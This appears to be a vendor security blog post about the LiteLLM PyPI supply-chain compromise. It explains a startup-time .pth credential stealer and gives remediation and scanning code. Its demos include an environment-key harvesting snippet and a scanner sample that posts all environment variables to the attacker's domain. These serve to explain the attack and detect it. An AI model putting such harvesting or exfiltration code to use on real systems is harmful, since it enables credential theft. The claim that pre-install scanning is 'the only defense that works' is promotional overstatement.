What Happened
On March 24, 2026, an attacker compromised the PyPI maintainer account for LiteLLM — the widely used Python library that provides a unified interface to 100+ LLM providers. Two malicious versions were published: v1.82.7 and v1.82.8.
LiteLLM is a core dependency for agent frameworks including CrewAI, DSPy, and countless custom AI agent deployments. Any system that pulled a fresh install or upgrade in the attack window received the compromised package.
The LiteLLM team has engaged Google Mandiant for incident response. The malicious packages have been removed from PyPI. All maintainer accounts have been rotated.
The Payload: What It Stole
The credential stealer was comprehensive. It harvested:
- Environment variables — API keys for OpenAI, Anthropic, Azure, AWS, every LLM provider configured
- SSH keys — private keys from `~/.ssh/`
- Cloud credentials — AWS, GCP, Azure, and Kubernetes configs
- Crypto wallets — seed phrases and private keys
- Database passwords — from config files and env vars
- SSL private keys
- Shell history — `.bash_history`, `.zsh_history`
- CI/CD configs — GitHub Actions secrets, Jenkins credentials
The stolen data was encrypted with AES-256-CBC + RSA-4096 and exfiltrated via HTTPS POST to litellm.cloud — a domain registered just hours before the attack. The encryption made the exfiltration traffic appear benign to network monitors.
The Persistence Mechanism
Version 1.82.8 introduced a particularly dangerous escalation: a `.pth` file that Python executes automatically on startup.
This means the credential stealer didn't require an explicit `import litellm`. Any Python process — a Jupyter notebook, a Flask server, a cron job, a different AI agent entirely — would trigger the payload simply by starting Python in an environment where the compromised package was installed.
This is the difference between a malicious library (runs when imported) and a malicious environment (runs when Python starts). The attack surface expanded from "code that uses LiteLLM" to "any Python code running on the same machine."
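The mechanism is easy to demonstrate with a benign `.pth` file. Lines in a `.pth` file that begin with `import ` are executed by Python's `site` module when a site directory is processed — which is exactly what happens for `site-packages` at interpreter startup. A minimal sketch (the `sys._pth_demo` attribute name is arbitrary, chosen for the demo):

```python
# Benign demonstration of the .pth mechanism: any line in a .pth file that
# starts with "import " is executed when the site module processes the
# directory -- the same thing happens for site-packages at interpreter startup.
import os
import site
import sys
import tempfile

d = tempfile.mkdtemp()
with open(os.path.join(d, "demo.pth"), "w") as f:
    # This line runs as code, without the user ever importing any package.
    f.write('import sys; sys._pth_demo = "code ran at startup"\n')

site.addsitedir(d)  # processes .pth files the same way startup does
print(getattr(sys, "_pth_demo", "not run"))
```

A malicious package only has to drop such a file into `site-packages` during installation; from then on every interpreter launched in that environment runs the payload.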
Why AI Agent Deployments Are Uniquely Vulnerable
This attack hit the AI agent ecosystem harder than a typical PyPI compromise for three structural reasons:
1. AI agents store secrets in environment variables
The standard pattern for configuring AI agents is environment variables: `OPENAI_API_KEY`, `ANTHROPIC_API_KEY`, `AZURE_OPENAI_KEY`. LiteLLM's own documentation instructs users to set API keys this way. The payload was designed to harvest exactly these variables because that's where the money is.
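Sweeping those keys up takes one expression for any code sharing the process. A minimal illustration (the key below is a fake stand-in):

```python
import os

# Stand-in for a real key set by an agent framework's configuration step.
os.environ["OPENAI_API_KEY"] = "sk-demo-not-a-real-key"

# Any code in the process -- including a dependency's install-time hook --
# can sweep up every configured provider credential in one expression.
harvested = {k: v for k, v in os.environ.items()
             if k.endswith("_API_KEY") or "SECRET" in k or "TOKEN" in k}
print(sorted(harvested))
```

There is no permission boundary here: environment variables are readable by every line of code the interpreter runs.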
2. Transitive dependencies are invisible
Many teams don't use LiteLLM directly. They use CrewAI, DSPy, or custom frameworks that depend on LiteLLM. A `pip install crewai` pulls LiteLLM as a transitive dependency. The developer who ran the install may never have seen LiteLLM in their requirements file — but it was there, and it was compromised.
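You can check whether an environment pulled a package in transitively, and through what, with the standard library alone. A sketch (the prefix match below is a deliberate simplification of full requirement parsing):

```python
# Which installed distributions declare a given package as a requirement?
from importlib import metadata

def who_requires(name: str) -> list[str]:
    """Installed distributions that list `name` in their requirements."""
    dependents = []
    for dist in metadata.distributions():
        for req in dist.requires or []:
            # Requirement strings look like "litellm>=1.80; extra == 'proxy'".
            # A prefix match is a simplification, not a full PEP 508 parse.
            if req.split(";")[0].strip().lower().startswith(name.lower()):
                dependents.append(dist.metadata["Name"])
    return sorted(set(dependents))

print(who_requires("litellm"))  # non-empty if something pulls it transitively
```

If the list is non-empty, LiteLLM is on your machine whether or not it appears in your own requirements file.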
3. Auto-upgrade in CI/CD pipelines
Production deployments that use `pip install litellm` without version pinning (or with `litellm>=1.82.0`) automatically pulled the malicious version on their next build. CI/CD pipelines that build fresh environments on every deploy were especially exposed — every build in the attack window installed the compromised package.
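A cheap CI guard is to fail the build whenever any requirement is not an exact pin. A sketch (the regex is a rough approximation of requirement syntax, not a full PEP 508 parser):

```python
# Minimal CI guard: reject any requirement line that is not an exact == pin.
# Exact pins would have kept the malicious 1.82.7/1.82.8 releases out of
# automated builds.
import re

def unpinned(requirements_text: str) -> list[str]:
    """Return requirement lines that are not exact `==` pins."""
    bad = []
    for line in requirements_text.splitlines():
        line = line.split("#")[0].strip()  # drop comments and blanks
        if not line:
            continue
        # Rough approximation of "name==version"; not a full PEP 508 parser.
        if not re.match(r"^[A-Za-z0-9._\[\]-]+==[A-Za-z0-9.!+*]+$", line):
            bad.append(line)
    return bad

reqs = "litellm>=1.82.0\ncrewai==0.80.0\n"
print(unpinned(reqs))  # -> ['litellm>=1.82.0']
```

Running a check like this in CI turns "we forgot to pin" from a silent exposure into a failed build.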
The Pattern: This Keeps Happening
LiteLLM is not an isolated incident. It's the latest in an accelerating series of supply chain attacks targeting AI developer tooling:
| Date | Incident | Impact |
|---|---|---|
| Mar 19, 2026 | Trivy GitHub Action compromised | 12,000+ CI/CD pipelines, API keys stolen from memory |
| Mar 21, 2026 | Cargo CVE-2026-33056 | Build-time code execution in Rust MCP servers |
| Mar 24, 2026 | LiteLLM PyPI hijack (this incident) | All environments with compromised package, auto-execute on Python start |
Three supply chain attacks on AI developer tools in six days. The attackers aren't targeting the models — they're targeting the scaffolding. Package managers, CI/CD tools, and dependency chains are where the credentials live and where the defenses are weakest.
What to Do Right Now
If you installed LiteLLM in the last 48 hours:
- Check your installed version: `pip show litellm` — if it shows 1.82.7 or 1.82.8, you were affected
- Rotate ALL credentials immediately: Every API key, SSH key, cloud credential, and database password on the affected machine should be considered compromised
- Check for `.pth` files: Look in your Python `site-packages` directory for any unexpected `.pth` files that weren't there before
- Audit your CI/CD pipelines: Check build logs for `litellm==1.82.7` or `litellm==1.82.8` in any recent deployment
- Update to a clean version: `pip install litellm==1.82.6` (last known-good version)
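The version check and the `.pth` audit can be combined into one triage script. A sketch, assuming a standard venv/CPython layout where `site.getsitepackages()` is available:

```python
# Triage: is a compromised litellm release installed, and which .pth files
# will the interpreter process at startup?
import glob
import os
import site
from importlib import metadata

COMPROMISED = {"1.82.7", "1.82.8"}

try:
    version = metadata.version("litellm")
    status = "COMPROMISED" if version in COMPROMISED else f"clean ({version})"
except metadata.PackageNotFoundError:
    status = "not installed"
print(f"litellm: {status}")

pth_files = []
for d in site.getsitepackages() + [site.getusersitepackages()]:
    pth_files.extend(glob.glob(os.path.join(d, "*.pth")))
for p in sorted(pth_files):  # review anything unexpected in this list
    print(p)
```

Some `.pth` files are legitimate (editable installs, import hooks from tooling), so compare the list against a known-good machine rather than deleting blindly.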
If you use LiteLLM as a transitive dependency:
- Check your lockfile: Search `requirements.txt`, `poetry.lock`, or `Pipfile.lock` for `litellm` and verify the version
- Pin your dependencies: If you're using `litellm>=1.80`, change to `litellm==1.82.6` (exact version pin)
- Audit frameworks that depend on LiteLLM: CrewAI, DSPy, and other agent frameworks may pull it transitively
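The lockfile check can be scripted across a repository. A sketch (run from the project root; `find_litellm_pins` is a name introduced here for illustration):

```python
# Search the common Python lockfiles for any line that mentions litellm.
from pathlib import Path

def find_litellm_pins(root: str = ".") -> list[str]:
    """Lines mentioning litellm in common lockfiles under `root`."""
    hits = []
    for name in ("requirements.txt", "poetry.lock", "Pipfile.lock"):
        path = Path(root) / name
        if not path.exists():
            continue
        for lineno, line in enumerate(path.read_text().splitlines(), 1):
            if "litellm" in line.lower():
                hits.append(f"{name}:{lineno}: {line.strip()}")
    return hits

print(find_litellm_pins())
```

Any hit showing `==1.82.7` or `==1.82.8` means the compromised release is locked into your build.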
The Structural Problem: Scanning Happens Too Late
The LiteLLM attack exposes a gap in how AI agent deployments handle dependency security. Most teams' security posture looks like this:
- Developer runs `pip install`
- Package installs and (in this case) immediately executes
- Sometime later, maybe, someone runs a vulnerability scan
The credential theft happened at step 2. The scan at step 3 is too late — the data is already exfiltrated.
SkillShield's model inverts this: scan the dependency before it's installed, not after. For AI agent skills and MCP servers, SkillShield checks:
- Known malicious packages against a continuously updated threat database
- Suspicious dependency patterns — typosquatting, version manipulation, post-install hooks
- Permission scope — does this package need to read environment variables? Does it need network access to domains outside its stated function?
- Behavioral signatures — credential harvesting patterns, data encoding before transmission, connections to newly-registered domains
A LiteLLM package that reads all environment variables, encrypts them, and POSTs them to a domain registered the same day would trigger multiple CRITICAL findings in a SkillShield scan before installation.
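To make the idea concrete, here is a toy version of such a behavioral check. This is purely illustrative: SkillShield's actual signatures and engine are not described in this post, and the patterns and names below are assumptions invented for the sketch.

```python
# Toy pre-install heuristic: flag package source that bulk-reads the
# environment, uses crypto primitives, phones home, or installs a startup
# hook. Real scanners are far more sophisticated; this is only the shape.
import re

SIGNATURES = {
    "reads full environment": r"os\.environ\b(?!\[)",  # bulk access, not one key
    "encrypts before sending": r"AES|Cipher|PKCS1_OAEP",
    "network exfiltration": r"requests\.post|urlopen|http\.client",
    "startup hook": r"\.pth\b|sitecustomize",
}

def scan(source: str) -> list[str]:
    """Return the names of every signature that matches the source text."""
    return [name for name, pat in SIGNATURES.items() if re.search(pat, source)]

sample = (
    "import os, requests\n"
    "data = dict(os.environ)\n"
    "requests.post('https://litellm.cloud/x', json=data)\n"
)
print(scan(sample))
```

The crucial property is when this runs: against the downloaded artifact, before `pip install` ever executes it.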
Stop Storing Secrets in Environment Variables
The LiteLLM attack worked because API keys were stored as environment variables — readable by any process in the same environment. This is the default configuration for nearly every AI agent framework.
Better alternatives:
- Secrets managers: AWS Secrets Manager, HashiCorp Vault, 1Password Connect — secrets are fetched at runtime with scoped access, not baked into the environment
- Short-lived tokens: Instead of long-lived API keys, use OIDC tokens or session-based credentials that expire
- Encrypted key sharing: When you must share an API key, use encrypted, time-bounded sharing rather than pasting it into a `.env` file
If the LiteLLM victim had used a secrets manager with scoped access, the payload would have found empty environment variables instead of production credentials.
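The runtime-fetch pattern looks like this in outline. `VaultClient` here is a hypothetical stand-in invented for the sketch; substitute your real backend's client (e.g. boto3 for AWS Secrets Manager, hvac for HashiCorp Vault):

```python
class VaultClient:
    """Hypothetical stand-in for a real secrets backend (AWS Secrets Manager,
    HashiCorp Vault, 1Password Connect). A real client would authenticate
    with a short-lived identity and fetch over TLS."""

    def __init__(self, store: dict[str, str]):
        self._store = store

    def get(self, name: str) -> str:
        return self._store[name]

vault = VaultClient({"openai/api-key": "sk-demo"})

def call_llm(prompt: str) -> str:
    # The key is fetched at call time with scoped access and never exported
    # into os.environ, so a bulk environment sweep finds nothing.
    api_key = vault.get("openai/api-key")
    return f"would call provider (key ends ...{api_key[-4:]}) with {prompt!r}"

print(call_llm("hello"))
```

The design point is the access scope: the secret exists only inside the function that needs it, for the duration of the call, rather than sitting in process-wide state.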
Key Takeaways
- LiteLLM v1.82.7 and v1.82.8 were compromised — credential stealer that activated on Python startup, no import required
- AI agent deployments are structurally vulnerable — env-var secrets, transitive dependencies, auto-upgrade in CI/CD
- Three supply chain attacks on AI tools in six days (Trivy, Cargo, LiteLLM) — this is a pattern, not an anomaly
- Pre-install scanning is the only defense that works — post-install scans happen after the data is already stolen
- Stop storing secrets in environment variables — use secrets managers with scoped, short-lived access
Sources: LiteLLM GitHub Issue #24518 (primary technical timeline), Hacker News discussion (703 points, 435 comments), Google Mandiant engagement confirmed by LiteLLM team.